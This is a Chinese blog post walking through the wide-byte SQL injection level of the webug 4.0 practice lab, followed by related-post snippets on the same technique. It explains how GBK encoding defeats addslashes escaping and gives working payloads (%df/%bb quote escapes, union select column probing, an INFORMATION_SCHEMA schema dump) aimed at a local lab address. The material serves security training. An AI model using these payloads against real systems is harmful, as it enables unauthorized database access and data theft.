webug4.0-宽字节注入

最新推荐文章于 2022-05-11 14:31:46 发布
最新推荐文章于 2022-05-11 14:31:46 发布
阅读量290 收藏
点赞数
分类专栏: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nex1less/article/details/100009105
版权

0x01 相关知识

1. 宽字节是什么?

宽字节字符集:一般指Unicode编码的字符集

2. 宽字节注入的作用是什么?

可以绕过转义,也是绕过转义的其中一个办法

3. 宽字节注入产生的原因是什么?

MySQL连接时错误配置为:set character_set_client=gbk

本例错误配置PHP代码:$dbConnectWidth->query("SET names 'gbk'");

4.宽字节注入原理是什么?

当GPC开启(php.ini

  magic_quotes_gpc = On)或使用addslashes函数过滤提交的参数时,测试注入点使用的单引号 ' 就会被转义为: \'

  这个的作用就是对敏感函数的转义,让我们无法注入。

如果存在宽字节注入,我们输入%df%27时首先经过上面提到的转义就会变成%df%5c%27(%5c就是反斜杠)。之后再数据库查询由于使用了GBK多字节编码,即在汉字编码范围内两个字节会被编码为一个汉字,然后MySQL服务器会对查询语句进行了GBK编码%df%5c转换成汉字,而单引号逃出了,这个时候就可以注入了。%df不是固定的,可以自己组合。只要是汉字就可以。

参考链接:https://www.heibai.org/post/740.html

0x02 漏洞利用

1.上来看见这个

我们好像意识到了什么,好像有人在侮辱你。。。

2.常规注入手法:

1'页面没报错 刷新
1 and 1=1 %23                                     页面没报错 刷新
1 and 1=2 %23页面没报错 刷新
1' and 1=1 %23页面没报错 刷新
1' and 1=2 %23页面没报错 刷新
1%bb'页面报错

3.页面既然已经报错 ok单引号逃出,那么就好办了 如同显错注入一般 首先判断列数:

输入输出
3%bb' union select 1 %23页面报错
3%bb' union select 1,2 %23页面不报错

 ok 判断出来列数为2

4.获取所有数据库的名称:

192.168.72.136/control/sqlinject/width_byte_injection.php?id=3%bb' union select 1,group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA %23

5.ok 剩下的步骤其实和显错注入一样

请看这篇文章

6.最后放出flag:

dfsadfsadfas

0x03 结语

                                                                               这个也很简单,没啥可说的

nex1less
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webug宽字节注入
我只会装360的博客
10-08 200
GBK是一种多字符编码,一个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 (’) 、(")、 ()、 (NULL)、的四个字符添加反斜杠并将其返回。 Mysql有一个特性,在进行GBK编码时会将两个字符认为一个汉字(前提是第一个字符的ASCII大于128才能达到汉字范围)。 如果SQL输入经过了addslashes() 函数处理,我们输入’ 时 会变...
webug---SQL注入之宽字节注入
weixin_44352521的博客
12-17 169
宽字节注入原理: 如图,是一段源码,我们来看看这段源码的功能: 第一行是连接数据库 第二行是设置编码为gbk编码,即中文编码 第四行使用addslashes()函数,这个函数是用来转义单引号的,会将单引号转义为\',这样的话转义之后我们就无法闭合sql语句 例如: select first_name,last_name from id='1'; 上面的sql语句,如果是采用单引号闭合,那么经过...
webug4.0 宽字节注入
angry_program的博客
01-06 526
防止sql手工注入 在php+mysql中, 可以通过转义特殊字符来防止污染sql语句(防注入), 有两种情况: 魔术引号,magic_quote_gpc 开关,不过高版本的PHP将去除这个特性 安全函数, addslashes,mysql_real_escape_string,mysql_escape_string等。 宽字节注入 上有计策下有对策, 当程序员设置数据库编码与p...
webug4.0—宽字节注入
Stephen Wolf
01-10 290
宽字节注入原理即是利用编码转换,将服务器端强制添加的本来用于转义的\符号绕过,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。 前言 GBK是一种多字符编码,一个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 (') 、(")、 (\)、 (NULL)、的四个字符添加反斜杠并将其返回。 Mysql有一个特性,在进行GBK编码时会...
Webug4.0 打靶笔记
m0_60716947的博客
05-11 3964
一、Webug 的安装 (1)基本信息 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug 的 4.0 版本。 (2)虚拟机的安装 最新超详细VMware虚拟机下载与安装_隐
宽字节注入详解-附件资源
03-05
宽字节注入详解-附件资源
《USB-CAN通信协议 V4.0-2019.10.29》
04-07
can通讯协议格式:采用串口通讯,数据长度8位,无校验,1位停止位,波特率460800。报文为30个字节的固定长度,其中由前导码0x55 0xAA,字节的和校验和结尾符0x88组成。凡是用不到的报文都用0x00填充;
Unicode--宽字节字符集[文].pdf
10-12
Unicode--宽字节字符集[文].pdf
13 宽字节注入1
08-03
13 宽字节注入1
webug 6、宽字节注入
乔木同学
03-15 922
url:http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1 http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ and 1=1 --+ 不报错 http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ order by 2 --+ 不报错 http://1
webug 4.0 第六关 宽字节注入
ONS_cukuyo的博客
03-08 1169
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
webug4.0宽字节注入-6
weixin_34324081的博客
03-17 207
0x00  前言 GBK是一种多字符编码,一个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 (') 、(")、 (\)、 (NULL)、的四个字符添加反斜杠并将其返回。 Mysql有一个特性,在进行GBK编码时会将两个字符认为一个汉字(前提是第一个字符的ASCII大于128才能达到汉字范围)。 如果SQL输入经过了addslashes() 函...
Webug4.0靶场通关笔记(第三天)--------过滤注入和宽字节注入
Yasso的博客
02-21 717
一、过滤注入 这一关为过滤注入,我以为过滤了空格,百度说过滤了select,单独输select会报错。。。。。。。 那这就跟第四关POST注入一样,还是搞吧,POST省略了,这个不能省了。。。。。 1.是否报错 加个单引号会报错 2.既然有报错,先判断列数 可以看出有两列,尝试报错注入 union select 1,database()# -------------但页面没有回显,所以不能用显错注入 再次尝试 and 1=1# 和 and 1=2# -----但无论对错,都没有回显 所
如何运用宽字节实现Sql注入?
MSB_WLAQ的博客
10-08 247
什么是魔术引号 了解一个PHP的防御函数==》magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号(’)、双引号(”)、反斜线(\)等字符都会被加上反斜线 magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤.
Webug3.0 初级攻略 1-16关
安全解决方案
02-27 2455
虚拟机下载路径: 链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg  提取码:7jfs  第一关:很简单的一个注入   使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试 1.提交 ' 报错,可能存在注入点   还是一个字符型的注入漏洞 测试语句:http://172.27.73.13/pentes...
有趣的注入(宽字节注入
xiao白帽子学习之路
12-03 2674
ctf:有趣的注入 url:http://ctf.cdusec.org:8086/sqli.php?id=1 实验工具:火狐hackbar x001: 输入:” ‘ “单引号无反应,再输入" %df’ "(宽字节注入显示报错。) 截图: x002判断列数:判断出来有3列。 http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +...
webug 4.0 第一关 显错注入
ONS_cukuyo的博客
02-28 7768
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
宽字节注入入门详解
爱党人士
05-11 4382
原理: GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等), 单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C , 那么现在 %df\’ =%df%5c%27, 如果程序的默认...
webug4.0——注入篇
A_dmin的博客
09-09 2602
webug4.0——注入篇 今天接触到一个好玩的靶场环境~~ webug 就去下载安装玩了一下,网盘速度是真的慢,下载下一个下午!!! 附上下载链接:(内附安装教程) 链接: https://pan.baidu.com/s/1WlKzFXsNkfkzzCUR_PYtfA 提取码: jcaa 装好环境,在本地打开,界面还是不错的~ 直接开耍!!! 第一关看题目意思就知道是注入,还是报错注...
sql-labs宽字节注入
最新发布
07-28
宽字节注入是一种针对某些数据库的特殊注入攻击技术,它利用了某些数据库在处理字符编码转换时的漏洞。而 SQL-Labs 是一个用于学习和测试 SQL 注入漏洞的开源项目。 在宽字节注入中,攻击者通过在输入的数据中插入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值